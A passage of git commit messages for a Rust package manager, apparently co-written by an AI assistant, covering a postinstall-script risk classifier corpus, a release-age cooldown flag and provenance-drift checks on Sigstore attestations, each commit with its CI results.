- count_blocked_by_tier_none_counts_as_amber_conservative
- format_triage_summary_line_shape_is_stable (snapshot)
- format_triage_summary_line_all_zero_when_empty
- format_triage_summary_line_anchor_and_suffix_present
Queued for a later chunk (noted from reviewer): a stdout-capture
e2e test for the triage branch on the lockfile fast path. Not a
sign-off blocker — branch selection is thin glue over well-tested
helpers.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-cli ✓ (1455/1455)
- cargo nextest run --workspace --exclude ✓ (3878/3879;
lpm-integration-tests 1 failure is
the known lpm-task
perf_eval_glob
parallel-load
flake, all 4
perf_eval tests
pass serially in
0.38s; not in
touched crates)
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… hard-gate ≥60% green-rate
Closes the P2 ship contract from plan §18:
- Top-500 postinstall fixture corpus locked (500 entries, hard-asserted).
- ≥60% green classification rate (73% measured, hard-asserted).
- Zero false-positive reds (asserted).
- Adversarial corpus locked and passing (20 entries, all red-expected).
- Execution semantics still unchanged (annotation-only per D20).
Corpus growth (91 → 500):
- +409 fixture files across 14 categories. Distribution reflects
real-world top-500 postinstall shape: greens dominate (node-gyp
rebuild, tsc, husky install, prisma generate account for most
package postinstalls), ambers cover D18 network binary downloaders
+ common build-tool patterns, reds cover attack classes with
variety for regression coverage.
- Final breakdown: 310 green / 114 amber / 76 red / 20 adversarial.
- Green-rate over non-adversarial subset: 73% (well above the 60%
ship-criterion floor).
Harness enforcement (closes a late-Chunk-6 audit):
- New constant CORPUS_MIN_ENTRIES = 500. A drop to 499 now hard-fails
with a message pointing at plan §18 and telling future maintainers
to update doc + const in lockstep if the floor is lowered
deliberately. Previously the harness only asserted "not empty",
which left "500 locked" documentary-only.
- New assert_manifest_matches_filesystem: enumerates scripts/*.txt
and does a BTreeSet bijection check against manifest ids. Orphans
in either direction hard-fail with a labelled listing (missing-
script vs missing-manifest-entry). Previously the harness only
loaded manifest entries, so orphan files or stale manifest rows
drifted silently.
expectations.json regenerated from the filesystem and is now
mechanically regenerable via the README's Python one-liner. Notes
fields dropped — category lives in the id prefix, and stripping
notes makes the manifest trivially derivable from disk which is what
the bijection check exploits.
README updated: "starter set" → "500-script fixture set"; ship
criteria restated as hard-asserted; regeneration instructions embed
the manifest-from-filesystem command. Plan-doc contract ("top-500
corpus locked") now matches on-disk reality.
Tuning discipline followed per reviewer guidance: corpus growth came
first, miss shapes measured (zero — the classifier rules hold
across the broader corpus), no red rule was weakened, no green rule
was widened. Reached 73% green-rate naturally.
CI gate (exact CI commands):
- cargo clippy --workspace -- -D warnings ✓
- cargo fmt --check ✓
- cargo build --workspace ✓
- cargo nextest run -p lpm-security ✓ (395/395)
- cargo nextest run --workspace --exclude ✓ (3878/3879;
lpm-integration-tests 1 failure is
the known
lpm-task
perf_eval_glob
parallel-load
flake, passes
serially; not
in touched
crates)
P2 is complete. Next work moves to P3 (cooldown surface) per the
plan's phase ordering.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…oercion
Lands the plumbing for the Phase 46 P3 cooldown surface (§8, §11 P3)
without yet wiring it into install.rs — that's Chunk 2 alongside the
`--min-release-age=<dur>` clap flag.
Core pieces:
* `lpm-cli/src/release_age_config.rs` — new module.
* `parse_duration(&str) -> Result<u64, LpmError>` accepts `72h` / `3d` /
plain seconds; rejects empty, whitespace, unsupported units, negative
values, fractionals, `+` prefix (u64::from_str quietly takes it), and
multiplication overflow on h/d.
* `ReleaseAgeResolver::resolve(project_dir, cli_override)` walks the
§11 P3 precedence chain highest first: CLI → `package.json > lpm >
minimumReleaseAge` → `~/.lpm/config.toml` key
`minimum-release-age-secs` → default 86400. `./lpm.toml` is
deliberately NOT in the chain (D14).
* `read_global_min_age_from_file` is path-aware + fallible, mirroring
Phase 33's save-config loader. Malformed TOML, non-table top level,
and garbage values surface file-pathed errors with the offending
key name — not silently ignored the way `GlobalConfig::load`
swallows them.
* `parse_strict_u64_string` — single `pub(crate)` helper for every
string-to-seconds coercion site. Rejects `+` / `-` prefixes before
`parse::<u64>`, because `u64::from_str("+5")` silently returns
`Ok(5)` and would otherwise let `lpm config set
minimum-release-age-secs +259200` slip through a contract the CLI
parser rejects.
* `lpm-security/src/lib.rs` — new `SecurityPolicy::with_resolved_min_age`
constructor. Reads `trustedDependencies` from package.json with the
same tolerance as `from_package_json` but takes the seconds value
from the caller. Keeps lpm-security free of CLI/config-file
knowledge; `from_package_json` itself is untouched.
* `lpm-cli/src/commands/config.rs` — `GlobalConfig::get_u64` convenience
reader, routing string coercion through `parse_strict_u64_string`
for uniform "no sign prefix" semantics across CLI flag, global
loader, and this accessor.
Test coverage (50 unit tests, all pass): parser edge cases incl.
`+`/`-`/whitespace/garbage/overflow; global-file reader missing /
empty / integer / string-coerced / negative / garbage / wrong-type /
malformed-TOML all with file-pathed errors; resolver precedence
covering every §11 P3 ship-criteria case; `parse_strict_u64_string`
unit tests; plus-prefix regression guards on both the global loader
and `GlobalConfig::get_u64` (reviewer finding).
The `#[allow(dead_code)]` scaffolds on the module and on `get_u64` are
explicit "Chunk 2 removes this" scaffolds — the items are exercised by
unit tests but not yet called from the binary target. They come off
atomically when the clap flag + install.rs wiring lands.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
— 3927 pass / 2 fail. Both failures are
`lpm-task filter::eval::tests::perf_eval_*`, the known parallel-
nextest flakes called out in the P3 prompt; pass deterministically
with `-j 1`.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…urface Wires the Chunk 1 resolver into the install pipeline and exposes the Phase 46 P3 CLI surface (§8, §11 P3). After this commit a user-visible override chain exists end-to-end: `--min-release-age=<dur>` → package.json → `~/.lpm/config.toml` → default 24h. CLI surface: * `lpm install --min-release-age=<DUR>` — accepts `<N>h`, `<N>d`, or plain seconds. Parsed once at the clap layer via `release_age_config::parse_duration`; invalid input errors before any install work starts. * `--allow-new` unchanged (blanket bypass, orthogonal to this flag). * Blocked-packages hint reordered narrowest → broadest per the §11 P3 ship criteria: `--min-release-age=0` (per-install, numeric), `--allow-new` (per-install, blanket), `package.json` (persistent). * Error message surfaces both override paths. Install pipeline: * `run_with_options`, `run_add_packages`, `run_install_filtered_add` grow `min_release_age_override: Option<u64>` at end of signature. * Cooldown gate at install.rs:1646 replaced `SecurityPolicy::from_package_json(...)` with `ReleaseAgeResolver::resolve(project_dir, override)?` + `SecurityPolicy::with_resolved_min_age(...)`. One user-visible behaviour change lands with this: a malformed `~/.lpm/config.toml` (or garbage `minimum-release-age-secs` value) now fails install with a file-pathed error rather than being silently ignored — that's the path-aware loader contract from the Chunk 1 review, now live. Global-install rejection (reviewer finding): * `validate_global_install_project_scoped_flags` extended to reject `--min-release-age` on the `-g` path with an explicit Phase 46.1 pointer. Without this the clap flag was parsed AFTER the `-g` early return, so even `--min-release-age=garbage` silently passed — a contract bug where the shared `Install` clap surface advertised a flag that global installs silently ignored. * New regression test covers four payload shapes (`0`, `72h`, `garbage`, `+5h`) — each asserts the error names the flag AND points at Phase 46.1. Fan-out to 9 non-Install install-pipeline callers (`add`, `deploy`, `dev`, `doctor`, `migrate`, `run`, `upgrade`, `install_global`, `update_global`): each passes `None` with a one-line comment explaining why (`uses the chain` / D13/D19 global scope / `deploy already bypasses via allow_new=true`). Scaffolds: Chunk 1's `#![allow(dead_code)]` on the module and the temporary "Chunk 2 removes this" note on `GlobalConfig::get_u64` come off. `get_u64` keeps a single `#[allow(dead_code)]` with an honest note — it's retained for the behavioural unit test and future callers; no production caller exists because the resolver uses the path-aware fallible helper instead. Behavioural verification (manual, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`): * `lpm-rs install --help` — flag documented with full precedence chain. * `lpm-rs install --min-release-age=garbage` → exit 1 with duration- parse error. * `lpm-rs install -g foo --min-release-age=garbage` → exit 1 at CLI- exclusivity check (before parse_duration runs). * `lpm-rs install -g foo --min-release-age=0` → exit 1, same rejection. * `lpm-rs install -g foo` (no flag) → exit 0, proceeds normally. CI gate (explicit): * `cargo clippy --workspace -- -D warnings` — clean * `cargo fmt --check` — clean * `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches * `cargo build --workspace` — clean * `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 3928 pass / 2 fail. Both failures are the known `lpm-task filter::eval::tests::perf_eval_*` parallel-nextest flakes pre-flagged in the P3 prompt; pass deterministically with `-j 1`. Chunk 3 lands integration coverage: the §11 P3 ship-criteria E2E tests (`--min-release-age=72h` blocks; `--allow-new` unblocks; global TOML overrides default; package.json overrides global) and the §12.3 pin-bypass regression. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ss guard
Adds end-to-end coverage for the Phase 46 P3 cooldown surface against
a wiremock-backed mock registry. Closes the integration gap the
reviewer called out at the end of Chunk 2.
New file: `crates/lpm-cli/tests/release_age_p3_ship_criteria.rs` —
300 LOC, 5 subprocess tests.
Harness pattern is lifted from
`crates/lpm-cli/tests/upgrade_phase7_regression.rs`: start a
`wiremock::MockServer`, mount single-package + batch-metadata
endpoints with a controllable `time[VERSION]` field, serve a real
tarball, then spawn `lpm-rs install` with `LPM_REGISTRY_URL` pointing
at the mock and `HOME` scoped to a per-test temp dir (so the tests
never read the developer's `~/.lpm/config.toml`).
Tests (§11 P3 ship criteria):
* `cli_override_72h_blocks_fresh_package` — package published 1h ago,
manifest disables the check (`minimumReleaseAge: 0`),
`--min-release-age=72h` re-enables at 72h. Blocks; output renders
`259200` to prove the CLI value took effect.
* `allow_new_bypasses_cli_override` — same fixture plus
`--allow-new`. Cooldown does not fire. Proves orthogonality (§8.3,
D16): the two flags are independent escape hatches.
* `global_config_overrides_default` — package 30 min old, global
`minimum-release-age-secs = 3600` (1h), no manifest key, no CLI
flag. Blocks, output renders `3600` but NOT `86400` — proving the
global layer is what took effect.
* `package_json_overrides_global` — package 30 min old, global = 3600
(would block), manifest = 60 (1 min, would allow). Cooldown does
not fire — manifest layer wins.
§12.3 pin-bypass regression:
* `pin_does_not_bypass_cooldown` — explicit-version install
(`@lpm.dev/acme.widget@1.0.0`), package 1h old, default 24h
window. Blocks. The v1 plan proposed pin-bypass; v2 rejected it
per D7 because renovate / dependabot auto-pin PRs would otherwise
land compromised versions during the detection window (the axios
attack scenario in §1). This test is the structural guard that
the rejected behaviour never re-lands.
A shared `Fixture` struct encapsulates the mock-registry + tempdir +
scoped-HOME setup. Assertion helpers `assert_cooldown_blocked` and
`assert_cooldown_not_blocked` check both stdout and stderr (the
cooldown path uses `eprintln!` for warning lines and miette's
`LpmError::Registry` for the final error; both channels can carry
the signal depending on `--json` mode). Panic messages always dump
exit code + stdout + stderr so a failing assertion never leaves the
author guessing.
Behaviourally verified: all 5 tests pass in isolation
(`cargo nextest run -p lpm-cli --test release_age_p3_ship_criteria`).
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast`
— 3931 pass / 4 fail. All 4 failures are
`lpm-task filter::eval::tests::perf_eval_*`, the machine-load-sensitive
parallel-nextest flakes explicitly carved out in the P3 prompt
("never in touched crates"). Chunk 3 touches only lpm-cli; lpm-task
is untouched. Isolated lpm-cli runs (both new E2E tests and the
Chunk 1 unit tests) pass 55/55; lpm-security passes 395/395.
Phase 46 P3 is complete. Ship criteria 1–4 covered end-to-end,
§12.3 pin-bypass regression in place, global-config error surface
enforced by the path-aware loader committed in Chunk 1.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…location
Chunk 1 of the Phase 46 P4 provenance-drift work (§7, §11 P4). Pure
schema scaffolding — no install-pipeline behaviour change yet. The
fetch/cache and the drift comparator land in Chunks 2-3 per the
user-approved refined plan.
Type scaffolding:
* `lpm-registry`: `DistInfo` gains `signatures: Option<Vec<RegistrySignature>>`
and `attestations: Option<AttestationRef>` (§7.1). Non-breaking:
`serde(default)` + `skip_serializing_if = "Option::is_none"` keeps
legacy registry responses (LPM today) round-tripping cleanly. Also
now derives `Default` so `..Default::default()` works at the two
test construction sites (install_global.rs, global_phase37_e2e.rs).
* `lpm-registry`: new `RegistrySignature { keyid, sig }` models npm's
per-key package-signing surface.
* `lpm-registry`: new `AttestationRef { url, provenance }` models
npm's `dist.attestations` pointer. `provenance` kept as loose
`serde_json::Value` in Chunk 1; Chunk 2's fetcher types the subset
it consumes. This isolates schema evolution from the wire surface.
* `lpm-workspace`: `TrustedDependencyBinding` gains
`provenance_at_approval: Option<ProvenanceSnapshot>` (§6.2 field
ownership). JSON key is `provenanceAtApproval` matching the plan's
wire spec. Non-breaking via serde defaults.
Structural change — `ProvenanceSnapshot` relocated:
`lpm-security/src/triage.rs` → `lpm-workspace/src/lib.rs`
This was forced by the §6.2 wiring:
`TrustedDependencyBinding.provenance_at_approval` must reference the
type, but `lpm-security` already depends on `lpm-workspace`, so the
reverse edge would cycle. `ProvenanceSnapshot` is pure schema
(4 primitive/Option fields, no methods) and fits naturally alongside
`TrustedDependencyBinding`, which is also pure schema. The one
existing caller (`lpm-cli/src/build_state.rs:37`) updated to import
from `lpm_workspace` instead of `lpm_security::triage`. The four
struct-behaviour tests moved with the struct; triage.rs keeps a
pointer comment to where the type now lives.
Test coverage (3943 workspace tests, all pass):
* `lpm-registry`: 5 new tests on DistInfo legacy + npm-shape
round-trip, empty `signatures` array vs absent-key distinction,
partial `RegistrySignature` payload tolerance, untyped
`AttestationRef.provenance` preserves unknown fields.
* `lpm-workspace`: 4 moved ProvenanceSnapshot tests (unchanged
behavioural contract); 3 new TrustedDependencyBinding tests —
pre-P4 shape round-trips without emitting `provenanceAtApproval:
null`, with-provenance round-trip preserves every field, absent-
provenance marker (`present: false`) preserved for the §7.2
"provenance dropped" branch.
Forward-compat: existing test-helper construction sites for
`TrustedDependencyBinding` across lpm-workspace / lpm-cli /
approve_builds.rs / build.rs / build_state.rs converted to
`..Default::default()` so future P4 fields don't break the tests.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3943 pass / 0 fail. The `lpm-task
perf_eval_*` family passed this run as well (machine was idle
enough); prior chunks exercised the `-j 1` carveout for those,
they remain the known load-sensitive pattern.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
… extraction
CLI-side module that fetches a Sigstore attestation bundle from a
registry's `DistInfo.attestations.url`, parses out the leaf cert,
and extracts the GitHub Actions OIDC identity into a
`ProvenanceSnapshot`. The install-time call site + drift comparator
lands in Chunk 3.
Module (`crates/lpm-cli/src/provenance_fetch.rs`, ~670 LOC incl.
tests):
* `fetch_provenance_snapshot(http, cache_root, name, version, attestation_ref)`
— public API returning `Result<Option<ProvenanceSnapshot>, LpmError>`.
Explicit three-valued return:
- `Ok(Some(snap))` — definitive answer (extracted identity OR
registry-confirmed absence).
- `Ok(None)` — degraded/unknown (network failure, malformed bundle).
NEVER cached, so the next install retries. The Chunk 3 drift rule
will interpret this as "pass, don't drift" per the plan's
offline-mode contract (§11 P4).
- `Err(_)` — reserved for genuinely fatal conditions (cache
directory unwritable).
* Cache primitives: SHA-256 of `name@version` as filename under
`~/.lpm/cache/metadata/attestations/`; 7-day TTL; corrupt + stale
+ schema-version-mismatched entries all treated as misses; atomic
write via `.tmp` + rename. Lives under the existing `metadata`
subtree per the user's Q3 answer — no new `lpm cache clean`
surface needed.
* Sigstore bundle parser: handles both the standard
`{verificationMaterial: {x509CertificateChain: ...}}` shape and
npm's `{attestations: [{bundle: ...}]}` list wrapper.
* Cert SAN extractor: walks the x509 SAN extension via
`x509-parser = "0.16"` (already in-workspace via `lpm-cert`),
matches the GitHub Actions OIDC URI pattern
`https://github.com/<org>/<repo>/.github/workflows/<workflow>@<ref>`,
emits `(publisher="github:<org>/<repo>", workflow="<path>@<ref>",
cert_sha256="sha256-<hex>")`. Non-GitHub SANs / missing
extensions / garbage bytes all return `None` cleanly.
* Defensive limits: 1 MiB max response body (hostile-registry
defense), 15 s fetch timeout (install-path budget).
Infrastructure:
* `lpm-common/src/paths.rs` gains `LpmRoot::cache_metadata_attestations()`
— single canonical accessor for the cache path, consumed by
Chunk 3 when it wires the install gate.
* `crates/lpm-cli/Cargo.toml`: `x509-parser = "0.16"` as regular
dep, `rcgen = { version = "0.13", features = ["pem"] }` as
dev-dep (synthetic cert generation for SAN-extractor tests).
Scaffolding: module-level `#![allow(dead_code)]` matching P3
Chunk 1's pattern — the binary doesn't call into the module yet so
clippy flags 17 items as unused. The allow comes off atomically in
Chunk 3 alongside the install-gate wiring.
Test coverage (28 unit tests, all pass):
* 7 `parse_github_actions_uri` tests — happy path, nested workflow
path, non-GitHub host rejection, missing workflows segment,
missing ref suffix, missing repo, extra path segment.
* 4 `extract_san_identity` tests — GitHub cert happy path, non-GitHub
SAN, cert with no SAN, garbage bytes. Certs generated at test time
via rcgen with deterministic URI SANs.
* 6 `parse_sigstore_bundle` tests — standard shape, npm list wrapper,
present-but-no-extractable-identity, malformed JSON, missing cert
chain, non-base64 rawBytes.
* 7 cache tests — write/read round-trip, miss, corrupt file, schema
version mismatch, stale past TTL, parent-dir creation,
filename-collision sanity.
* 4 public-API tests — absent-ref shortcut, absent-url shortcut,
cache-hit skips network (pointed at unreachable URL to prove
no connection attempted), network-failure returns `None` AND
does not cache (the critical "don't poison future installs for
7 days" contract).
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — **3971/3971 pass**, including the full
`lpm-task filter::eval::tests::perf_eval_*` family (machine idle,
clean run).
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ot post-buffer Reviewer-flagged blocking defect: the 1 MiB "hostile registry" defense documented in the Chunk 2 module was ineffective because `fetch_and_parse` called `response.bytes().await` first (which buffers the full body into memory) and only then compared `bytes.len()` against `MAX_BUNDLE_BYTES`. A malicious or broken registry could therefore still force an oversized allocation before the check ran — the guard was cosmetic. Fix: enforce the cap in two stages, so no matter how the body is framed we never allocate past the cap. 1. **Stage 1 — pre-stream**: if the response declares a `Content-Length` greater than `MAX_BUNDLE_BYTES`, reject immediately. Dropping the response closes the connection without reading a body byte. Cheap early-out for the common case where legitimate servers declare truthful lengths. 2. **Stage 2 — mid-stream**: for chunked / undeclared-length responses, stream chunks via `response.bytes_stream()` into a bounded `Vec`, checking `buf.len() + chunk.len()` BEFORE copying. The moment a chunk would push the accumulator past the cap, we return `Err(())` — the stream drops, the connection closes, and `buf` stays under the limit. A hostile 10 MiB body thus never materializes in our heap. The worst-case allocation is now `MAX_BUNDLE_BYTES + chunk_size`, where `chunk_size` is hyper's buffer size (typically 8-16 KiB) — several orders of magnitude below the prior failure mode. Tests (4 new, 32 total in the module): * `fetch_and_parse_accepts_bundle_under_size_cap` — positive baseline via wiremock. If this fails, the streaming plumbing itself is broken. * `fetch_and_parse_rejects_oversized_body` — primary regression guard. 2 MiB body (truthful Content-Length) → Stage 1 rejects. * `fetch_and_parse_rejects_declared_oversized_content_length` — Stage 1 specificity. Declared Content-Length of `MAX_BUNDLE_BYTES+1` with a tiny 16-byte real body → rejected on the header alone, no body bytes consumed. * `fetch_returns_none_on_oversized_body_and_does_not_cache` — public-API flavor. Oversized body propagates through `fetch_provenance_snapshot` as `Ok(None)` (degraded), AND the rejected response is NOT written to cache (same poisoning contract as the network-failure case). Module docstring + the `fetch_and_parse` doc comment updated to describe the two-stage enforcement explicitly, so future readers can see the defense is real rather than inferred from the constant name. CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`): * `cargo clippy --workspace -- -D warnings` — clean * `cargo fmt --check` — clean * `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches * `cargo build --workspace` — clean * `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 3975/3975 pass, zero flakes (provenance_fetch tests alone: 32/32). Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…w-TCP responder
Reviewer-flagged test-harness defect: the Stage-1 regression test
for "reject on declared oversized Content-Length"
(fetch_and_parse_rejects_declared_oversized_content_length) passed
while panicking a wiremock/hyper background thread. Root cause:
the earlier version declared a `Content-Length` of `MAX_BUNDLE_BYTES+1`
while `set_body_bytes(vec![0u8; 16])` emitted only 16 actual body
bytes. That mismatch violates HTTP/1.1 framing, so hyper's response
writer panicked with "payload claims content-length of 16, custom
content-length header claims 1048577". The test assertion still
returned ok because the client saw a transport error — which our
code maps to `Err(())` anyway — but the run left a background
panic in the test output. Passing for the wrong reason.
Fix: drop wiremock/hyper entirely for this specific test and serve
the HTTP response from a raw `tokio::net::TcpListener`. The
responder:
1. Binds to `127.0.0.1:0` (OS-assigned port).
2. Accepts exactly one connection (single-shot — task exits after
serving, no leak).
3. Reads the request preamble (so the turn-taking looks well-formed
on the wire).
4. Writes a valid HTTP/1.1 response header block:
`HTTP/1.1 200 OK`
`Content-Length: <MAX_BUNDLE_BYTES+1>`
`Content-Type: application/octet-stream`
`Connection: close`
5. Closes the connection without writing a single body byte.
Our client's Stage-1 check fires on the declared `Content-Length`
value alone (via `response.content_length()`) and returns `Err(())`
before calling `bytes_stream()`, so the "declared vs actual"
framing discrepancy never surfaces on the client side either —
reqwest never tries to read a body it didn't get. Zero framing
violations anywhere in the test harness, clean stderr under
`--nocapture`.
Verified with `cargo nextest run provenance_fetch --nocapture`:
32/32 in the module pass with no stray panic lines between test
stages. Full workspace gate still 3975/3975.
Production code unchanged — the two-stage body-cap enforcement from
5379ada is already correct; this commit fixes only the test harness
that exercises it.
CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`):
* `cargo clippy --workspace -- -D warnings` — clean
* `cargo fmt --check` — clean
* `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches
* `cargo build --workspace` — clean (via prior compile)
* `cargo nextest run --workspace --exclude lpm-integration-tests
--no-fail-fast` — 3975/3975 pass, zero flakes.
Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…te-path Wires the Phase 46 P4 provenance-drift defense end-to-end. After this commit the full §7.2 loop is live on the fresh-resolution install path: install-time fetch → snapshot capture → comparator → block-on-drift; approve-builds → write `provenance_at_approval`; next install compares candidate version against that reference. Comparator (lpm-security): * New `lpm-security/src/provenance.rs` with `DriftVerdict` enum and `check_provenance_drift(approved, now) -> DriftVerdict`. Pure comparison — no I/O, no config. Maps the §7.2 five-branch table, distinguishing outer `None` (degraded fetch / missing approval, pass) from inner `present: false` (registry-confirmed absence, the axios signal against an approved-present reference). * 11 unit tests cover every match-table row plus a regression guard that degraded-fetch (`now = None`) is distinct from confirmed- absent (`now = Some(present: false)`) — the two look similar but have opposite verdicts and the comparator must never conflate them. Write-path (lpm-workspace + approve_builds): * `TrustedDependencies::approve_with_provenance(name, version, integrity, script_hash, provenance)` — new helper that persists `provenance_at_approval` on the binding. The existing `approve(...)` helper now delegates with `provenance_at_approval: None` so Legacy / provenance-agnostic callers remain unchanged. * `TrustedDependencies::provenance_reference_for_name(name)` — returns `(approved_version, &binding)` for any rich entry whose binding carries a non-None `provenance_at_approval`. Deliberate Chunk-3 simplification: picks the first provenance-bearing entry encountered, which is safe because filtering to provenance- bearing approvals prevents a legacy axios@1.13.5 entry from masking an axios@1.14.0 approval when checking axios@1.14.1. * All three `approve-builds` call sites — the single-pkg direct approve, the `--yes` bulk approve, and the interactive walk — switched to `approve_with_provenance(..., blocked.provenance_at_capture .clone())`. This closes the round-trip: install-time snapshot → `BlockedPackage.provenance_at_capture` → binding's `provenance_at_approval` → subsequent install's drift check. Producer fix (build_state): * `BlockedSetMetadataEntry` extended with `provenance_at_capture: Option<ProvenanceSnapshot>`. * `compute_blocked_packages_with_metadata` at build_state.rs:432 now pulls the snapshot from metadata instead of hardcoding `None` — fixes the reviewer-flagged producer-side underfill where non-drifting packages had no approval-time reference. Every blocked package now carries the capture regardless of whether its drift check fired. Install-gate wiring (install.rs): * New drift-gate block immediately after the P3 cooldown gate, gated on `!used_lockfile` (fresh-resolution only; lockfile fast- path skips by design — `lpm.lock` locks integrity, not attestation identity). `--allow-new` does NOT bypass per D16. * Short-circuits with zero network cost when the project has no rich `trustedDependencies` entries with provenance (pre-P4 projects, or no approvals at all). * For each resolved package with a provenance-bearing prior approval: extract `DistInfo.attestations` from the resolver's TTL cache, fetch the candidate snapshot via Chunk 2's `provenance_fetch::fetch_provenance_snapshot`, compare via the lpm-security comparator, collect drift offenders. * `§7.3` UX on block: per-package "@Version — <kind>" lines with "last approved: v<VERSION> via <publisher> / <workflow>" and the "axios 1.14.1 compromise (March 2026)" footer. Error message suggests `lpm approve-builds` to acknowledge the new identity (Chunk 4 adds `--ignore-provenance-drift` override flags). * `build_blocked_set_metadata` at install.rs:2865 extended to also fetch provenance per package — this is what populates `BlockedSetMetadataEntry.provenance_at_capture` and closes the approval-round-trip. Graceful degradation: if `LpmRoot::from_env()` fails (HOME unset), the function's "never returns an error" contract is preserved and `provenance_at_capture` is `None` for every package. Chunk 2 scaffold removal: * `#![allow(dead_code)]` on `provenance_fetch` module removed. The install-gate call site + `build_blocked_set_metadata` both consume the module's public API, so all 17 items are reachable from the binary target and clippy is clean without the scaffold. Test coverage (3986 workspace tests, all pass): * 11 new `lpm-security::provenance::tests` covering the §7.2 match table + degraded-vs-confirmed-absent regression guard. * Existing `lpm-cli` `provenance_fetch` tests (32) + `lpm-workspace` schema tests (9) still pass unchanged — the scaffold removal and the helper additions are non-breaking. * Forward-compat: the one `BlockedSetMetadataEntry` test-helper construction site (build_state.rs:1519) uses `..Default::default()` so future P4 fields don't force test re-edits. CI gate (explicit, `CARGO_TARGET_DIR=/tmp/lpm-phase46-target`): * `cargo clippy --workspace -- -D warnings` — clean * `cargo fmt --check` — clean * `grep -r 'fancy-regex' crates/*/Cargo.toml` — no matches * `cargo build --workspace` — clean * `cargo nextest run --workspace --exclude lpm-integration-tests --no-fail-fast` — 3986/3986 pass, zero flakes (full `lpm-task perf_eval_*` family clean). Chunk 4 follows with override flags (`--ignore-provenance-drift[-all]`) + global-install rejection; Chunk 5 lands the E2E wiremock suite covering the §11 P4 ship criteria. Co-Authored-By: Claude Opus 4.7 (1M context) <noreply@anthropic.com>
…ference selector Two reviewer-flagged defects in 917239c, both now corrected with dedicated regression guards. ## Finding 1 (critical) — drift comparator flagged legitimate releases The Chunk 3 comparator compared snapshots via full-struct `==`, which treated the per-release ref (`refs/tags/v1.14.0` vs `v1.14.1`) and the per-signing Fulcio leaf cert SHA as part of the identity tuple. Every legitimate patch bump from the same repo + workflow would have been classified `IdentityChanged` and hard-blocked. Fix is a schema split + comparator rewrite: * `ProvenanceSnapshot.workflow: Option<String>` → two fields: * `workflow_path: Option<String>` — `.github/workflows/publish.yml`. Stable across releases from the same workflow. Part of the drift-check identity tuple. * `workflow_ref: Option<String>` — `refs/tags/v1.14.0`. Varies per release. Retained for audit / UX ("last approved: v1.14.0 via <id> (ref: refs/tags/v1.14.0)") but NOT part of identity. * `attestation_cert_sha256` similarly excluded from identity (Fulcio rotates the leaf per signing). Retained for audit. * `parse_github_actions_uri` now splits `<path>@<ref>` at the last `@` and prepends `.github/workflows/` so `workflow_path` is the full canonical path (matches §6.1 wire spec). * `lpm-security::provenance::check_provenance_drift` gains an internal `identity_equal(a, n)` helper that compares ONLY `(present, publisher, workflow_path)`, replacing the full-struct `==` in the "exact match" arm. Regression guards (3 new, both layers): * `provenance_fetch::tests::parse_uri_release_bump_changes_ref_but_not_path` — v1.14.0 vs v1.14.1 URIs produce the SAME workflow_path and DIFFERENT workflow_ref. Parser-level proof. * `lpm_security::provenance::tests::no_drift_when_only_workflow_ref_differs_between_releases` — the primary comparator regression guard. axios v1.14.0 vs v1.14.1 with different refs AND different cert SHAs → NoDrift. * `lpm_security::provenance::tests::no_drift_when_only_cert_sha_differs_across_rotations` — secondary guard: identical publisher + workflow_path + workflow_ref but different cert SHA → NoDrift. Covers the case where the same workflow re-signs (e.g., a republish) without a tag change. Updated tests (schema broadening, not semantic change): * `identity_changed_when_only_workflow_differs` renamed to `identity_changed_when_workflow_path_differs` — same repo, same release tag, DIFFERENT workflow file (e.g., a PR-triggered workflow impersonating the main publish path). `workflow_path` IS part of the identity tuple; this remains `IdentityChanged`. * `identity_changed_when_only_cert_sha_differs` deleted — the old assertion was the exact behavior we're fixing. The new `no_drift_when_only_cert_sha_differs_across_rotations` test encodes the correct post-fix behavior. ## Finding 2 (medium) — non-deterministic reference selector `provenance_reference_for_name` used `map.iter().find_map(...)` over a `HashMap`, whose iteration order isn't stable. Impact: the "last approved: vX" UX line could show different versions across runs, and when multiple provenance-bearing approvals for the same package name carried DIFFERENT identities (legitimate publisher migration, or prior attack + cleanup), the drift VERDICT itself could flip between runs. Fix: collect 